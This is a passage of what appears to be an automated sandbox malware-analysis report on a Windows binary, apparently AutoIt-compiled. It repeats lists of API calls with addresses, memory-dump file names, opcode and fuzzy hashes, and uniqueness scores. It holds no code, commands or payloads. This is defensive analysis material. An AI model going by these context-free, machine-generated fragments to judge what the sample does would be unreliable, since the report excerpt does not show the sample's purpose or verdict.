                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: __lock$CriticalEnterIncrementInterlockedSection___addlocaleref__mtinitlocknum
                          • String ID:
                          • API String ID: 1687444384-0
                          • Opcode ID: 85a570d7593165e866d0f5aa28d7d1661ece979e985dc47e50947bbdf002078f
                          • Instruction ID: 48db0f960a30a541b558b4a70932ed9d1d4c63fc13711453f6f0d0d2a07bbf9c
                          • Opcode Fuzzy Hash: 85a570d7593165e866d0f5aa28d7d1661ece979e985dc47e50947bbdf002078f
                          • Instruction Fuzzy Hash: A8016D72451B10DFD720EF65E805759B7E0EF40325F20898EE4AA872B0CFB0AA40CB05
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • _memset.LIBCMT ref: 00B6E14D
                          • _memset.LIBCMT ref: 00B6E15C
                          • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00BC3EE0,00BC3F24), ref: 00B6E18B
                          • CloseHandle.KERNEL32 ref: 00B6E19D
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: _memset$CloseCreateHandleProcess
                          • String ID:
                          • API String ID: 3277943733-0
                          • Opcode ID: 50586644eebbd6828de0591fd70af92de7f793faf26cbf6ba6f6c65ef4f0bfd6
                          • Instruction ID: 07ba0b0c4163248f771f66691b596f42a9afa463b9352633f0a4bbf0cfc9afae
                          • Opcode Fuzzy Hash: 50586644eebbd6828de0591fd70af92de7f793faf26cbf6ba6f6c65ef4f0bfd6
                          • Instruction Fuzzy Hash: EDF0E9F1940311BFF3106B25AC45FB77AECDB09B54F408825BA08D71A1DBB68E0187B4
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • RtlEnterCriticalSection.NTDLL(?), ref: 00B49C7F
                            • Part of subcall function 00B4AD14: _memset.LIBCMT ref: 00B4AD49
                          • _memmove.LIBCMT ref: 00B49CA2
                          • _memset.LIBCMT ref: 00B49CAF
                          • RtlLeaveCriticalSection.NTDLL(?), ref: 00B49CBF
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: CriticalSection_memset$EnterLeave_memmove
                          • String ID:
                          • API String ID: 48991266-0
                          • Opcode ID: a915adacc8c43cd32f3e2ef0698402fdb454a07215c6ccf6ca889bea67548c13
                          • Instruction ID: 810da3e0b91f5b9ddfb63babdd5f1f9cddd58efb82bedaddf78cc6608838637b
                          • Opcode Fuzzy Hash: a915adacc8c43cd32f3e2ef0698402fdb454a07215c6ccf6ca889bea67548c13
                          • Instruction Fuzzy Hash: 11F05476200010ABCF016F54EC85E9ABB69EF45310F04C0A2FE085F267C735E911DBB5
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                            • Part of subcall function 00B1B58B: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 00B1B5EB
                            • Part of subcall function 00B1B58B: SelectObject.GDI32(?,00000000), ref: 00B1B5FA
                            • Part of subcall function 00B1B58B: BeginPath.GDI32(?), ref: 00B1B611
                            • Part of subcall function 00B1B58B: SelectObject.GDI32(?,00000000), ref: 00B1B63B
                          • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 00B6E860
                          • LineTo.GDI32(00000000,?,?), ref: 00B6E86D
                          • EndPath.GDI32(00000000), ref: 00B6E87D
                          • StrokePath.GDI32(00000000), ref: 00B6E88B
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                          • String ID:
                          • API String ID: 1539411459-0
                          • Opcode ID: 4caf099fe9c74047ce1ae50b01e818daa2d579de90d4b6348ea4d4e750488a42
                          • Instruction ID: c0401595ee00cdc6ef30a7b0f00109902baed023d01905e760163e5d71918068
                          • Opcode Fuzzy Hash: 4caf099fe9c74047ce1ae50b01e818daa2d579de90d4b6348ea4d4e750488a42
                          • Instruction Fuzzy Hash: 4EF0BE31004259BADB122F58AC0DFCA3F9AAF0A310F008142FA11660F18B798551CF95
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00B3D640
                          • GetWindowThreadProcessId.USER32(?,00000000), ref: 00B3D653
                          • GetCurrentThreadId.KERNEL32 ref: 00B3D65A
                          • AttachThreadInput.USER32(00000000), ref: 00B3D661
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                          • String ID:
                          • API String ID: 2710830443-0
                          • Opcode ID: 845a207904d74917e7b6d090b013509defb2a3ab57f9b293d55166c387a2c4b2
                          • Instruction ID: e802e465dcc0053f01709794c3dc76ca690a8f74cccef382d07aa1d66c383d00
                          • Opcode Fuzzy Hash: 845a207904d74917e7b6d090b013509defb2a3ab57f9b293d55166c387a2c4b2
                          • Instruction Fuzzy Hash: DEE0ED71541228BADB205FA2EC0EEDB7F6CEF567B1F408052B61D960A0DA75D580CBA0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • GetCurrentThread.KERNEL32 ref: 00B3BE01
                          • OpenThreadToken.ADVAPI32(00000000), ref: 00B3BE08
                          • GetCurrentProcess.KERNEL32(00000028,?), ref: 00B3BE15
                          • OpenProcessToken.ADVAPI32(00000000), ref: 00B3BE1C
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: CurrentOpenProcessThreadToken
                          • String ID:
                          • API String ID: 3974789173-0
                          • Opcode ID: 14f18e79a818b1c5d9d108bde5e2af03877cb5eae9432cdf70c2e036d8393c34
                          • Instruction ID: fabed7d8ff38b51f7f1bcb6d2e029db0b0dad666750ff18f86cdfe36db15c3e6
                          • Opcode Fuzzy Hash: 14f18e79a818b1c5d9d108bde5e2af03877cb5eae9432cdf70c2e036d8393c34
                          • Instruction Fuzzy Hash: 49E04F326412219BD7102FB59C0CF973BA8EF58792F108819F241DB0A0DA248441C765
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • GetSysColor.USER32(00000008), ref: 00B1B0C5
                          • SetTextColor.GDI32(?,000000FF), ref: 00B1B0CF
                          • SetBkMode.GDI32(?,00000001), ref: 00B1B0E4
                          • GetStockObject.GDI32(00000005), ref: 00B1B0EC
                          • GetWindowDC.USER32(?,00000000), ref: 00B7ECFA
                          • GetPixel.GDI32(00000000,00000000,00000000), ref: 00B7ED07
                          • GetPixel.GDI32(00000000,?,00000000), ref: 00B7ED20
                          • GetPixel.GDI32(00000000,00000000,?), ref: 00B7ED39
                          • GetPixel.GDI32(00000000,?,?), ref: 00B7ED59
                          • ReleaseDC.USER32(?,00000000), ref: 00B7ED64
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                          • String ID:
                          • API String ID: 1946975507-0
                          • Opcode ID: 5aec9e306156a92c1b6927747536f366992f210da687576a7d39674f928603b7
                          • Instruction ID: 10f67c47d1d6109ee387ed4c6b07d4b8fbdfd988c60b87b7e9bf569c12773f25
                          • Opcode Fuzzy Hash: 5aec9e306156a92c1b6927747536f366992f210da687576a7d39674f928603b7
                          • Instruction Fuzzy Hash: A1E0C931500240AAEB216B74AC4DBD83B61EF55335F14C2A6F679690F2CB718980DB11
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • OleSetContainedObject.OLE32(?,00000001), ref: 00B3ECA0
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: ContainedObject
                          • String ID: AutoIt3GUI$Container
                          • API String ID: 3565006973-3941886329
                          • Opcode ID: c29c4af5a20fb6f84660baa213aff0254d2cd809aa59cf9d90cdcca663b739e9
                          • Instruction ID: 3bf93e0a2da07a8173f23a07d458539a7b47c8b1c9c8a4b9c12082ccf4a86d0e
                          • Opcode Fuzzy Hash: c29c4af5a20fb6f84660baa213aff0254d2cd809aa59cf9d90cdcca663b739e9
                          • Instruction Fuzzy Hash: DA913874600701DFDB14DF64C884A6ABBE5FF48710F2485AEF95ADB291EBB0E841CB60
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                            • Part of subcall function 00B3A857: lstrcmpiW.KERNEL32(?,00000000), ref: 00B3A89D
                          • _memset.LIBCMT ref: 00B5C6BA
                          • _memset.LIBCMT ref: 00B5C7D8
                          Strings
                          • NULL Pointer assignment, xrefs: 00B5C85D
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: _memset$lstrcmpi
                          • String ID: NULL Pointer assignment
                          • API String ID: 1020867613-2785691316
                          • Opcode ID: 382abd14b09d6deb856e5308e9b5f51377da17ff150fb2dab5f8d74019f8dfcf
                          • Instruction ID: 2e7318dd9fe961e540c33815a66a37a8e298788fe28b9b2d3ccf6d3fdf42fda6
                          • Opcode Fuzzy Hash: 382abd14b09d6deb856e5308e9b5f51377da17ff150fb2dab5f8d74019f8dfcf
                          • Instruction Fuzzy Hash: 24910971D00218AFDB10DFA4DC85EEEBBB9EF08750F20459AF919A7291DB705A45CFA0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                            • Part of subcall function 00B03BCF: _wcscpy.LIBCMT ref: 00B03BF2
                            • Part of subcall function 00B084A6: __swprintf.LIBCMT ref: 00B084E5
                            • Part of subcall function 00B084A6: __itow.LIBCMT ref: 00B08519
                          • __wcsnicmp.LIBCMT ref: 00B4E785
                          • WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 00B4E84E
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
                          • String ID: LPT
                          • API String ID: 3222508074-1350329615
                          • Opcode ID: 552fff38e94cbbb3f1566a961b2c81cec0ee8eb3a298f1c15678634283ed740a
                          • Instruction ID: a38730cbe1840ea6e2a264e5161ab0e0f6b3352ef1bd18553e42880579cfc260
                          • Opcode Fuzzy Hash: 552fff38e94cbbb3f1566a961b2c81cec0ee8eb3a298f1c15678634283ed740a
                          • Instruction Fuzzy Hash: 80613A75A00215AFCF14EB94C895EAEBBF8FB08310F1541A9F556AB291DB70EF409B50
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • Sleep.KERNEL32(00000000), ref: 00B01B83
                          • GlobalMemoryStatusEx.KERNEL32 ref: 00B01B9C
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: GlobalMemorySleepStatus
                          • String ID: @
                          • API String ID: 2783356886-2766056989
                          • Opcode ID: 34b2fafd76d98f56aa18b0ea3bfaa142c39e38c48685f21ad569566520c45a49
                          • Instruction ID: cf12a12e2280fa94450b34dc799ef6fe83458ea59830ad2315a92378998fc5d5
                          • Opcode Fuzzy Hash: 34b2fafd76d98f56aa18b0ea3bfaa142c39e38c48685f21ad569566520c45a49
                          • Instruction Fuzzy Hash: CF513C714087449BE320AF14D885BABBBECFF95354F81488DF1C8420A5EF7199ACC756
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                            • Part of subcall function 00B0417D: __fread_nolock.LIBCMT ref: 00B0419B
                          • _wcscmp.LIBCMT ref: 00B4CF49
                          • _wcscmp.LIBCMT ref: 00B4CF5C
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: _wcscmp$__fread_nolock
                          • String ID: FILE
                          • API String ID: 4029003684-3121273764
                          • Opcode ID: b201bb42cfe8da23cb4ada073a39c35e12ba71617215c10ec9e81bc93b56e4db
                          • Instruction ID: 495455a38bc614cff35595b17f03128dd2dac8cc7d7fc9250b3b566fc758d49e
                          • Opcode Fuzzy Hash: b201bb42cfe8da23cb4ada073a39c35e12ba71617215c10ec9e81bc93b56e4db
                          • Instruction Fuzzy Hash: 4241B172A00219BADF109BA4DC81FEF7FFAEF49B10F0004A9F605BA191D7719A489B50
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • SendMessageW.USER32(00000027,00001132,00000000,?), ref: 00B6A668
                          • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00B6A67D
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: MessageSend
                          • String ID: '
                          • API String ID: 3850602802-1997036262
                          • Opcode ID: 35155d4516f4dd87a25359486d06d331cf40ae6555cb226a36a093fb9b26c35d
                          • Instruction ID: 50451e2306a8d078f4e8f61689ee461971e8178d6eab8cfd4194b65eb95d91dc
                          • Opcode Fuzzy Hash: 35155d4516f4dd87a25359486d06d331cf40ae6555cb226a36a093fb9b26c35d
                          • Instruction Fuzzy Hash: 21410775A002099FDF14CF68D880BDA7BF9FB09300F1444AAE909EB381D774A941CFA1
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • _memset.LIBCMT ref: 00B557E7
                          • InternetCrackUrlW.WININET(?,00000000,00000000,?), ref: 00B5581D
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: CrackInternet_memset
                          • String ID: |
                          • API String ID: 1413715105-2343686810
                          • Opcode ID: d3e789bb88379a71799c52509a0226b6e814d2d715278c6946472503c3d3d64c
                          • Instruction ID: af19135b9bbeb69bc867170ffeb8488b76bd1164e2f02cc4315c256df40dd2de
                          • Opcode Fuzzy Hash: d3e789bb88379a71799c52509a0226b6e814d2d715278c6946472503c3d3d64c
                          • Instruction Fuzzy Hash: AF313D71900119EBDF11AFA0DC95EEE7FF8FF18301F104095F815A6161EB315A4ACB60
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • DestroyWindow.USER32(?,?,?,?), ref: 00B6961B
                          • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00B69657
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: Window$DestroyMove
                          • String ID: static
                          • API String ID: 2139405536-2160076837
                          • Opcode ID: 4e6ad2af1362d3ed03494ceb75ebecb27ffa22b3acb0dc7c30226a4c7c43ee56
                          • Instruction ID: 06228b58ce2dfcde463b1a27c85624530f7785683e39c9eb3bf603533611713e
                          • Opcode Fuzzy Hash: 4e6ad2af1362d3ed03494ceb75ebecb27ffa22b3acb0dc7c30226a4c7c43ee56
                          • Instruction Fuzzy Hash: 4931A831500204AAEB109F28DC80FFB77EDFF58360F50861AF8AAC7190CA35AC91CB60
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • _memset.LIBCMT ref: 00B45BE4
                          • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00B45C1F
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: InfoItemMenu_memset
                          • String ID: 0
                          • API String ID: 2223754486-4108050209
                          • Opcode ID: 7ab78eeeda9608335e0b5284652c87e2d6df213e266de5aad5a5c6830f78af2b
                          • Instruction ID: 00fdfc3ae0c8a3893f109a18a343c34b73cfd4c83a02b90420dd343eb8b1a443
                          • Opcode Fuzzy Hash: 7ab78eeeda9608335e0b5284652c87e2d6df213e266de5aad5a5c6830f78af2b
                          • Instruction Fuzzy Hash: 3531A531600B19ABDB349F98D9C5BADBBF9EF05350F180099E9C5A61A3D7709B44EF10
                          Uniqueness

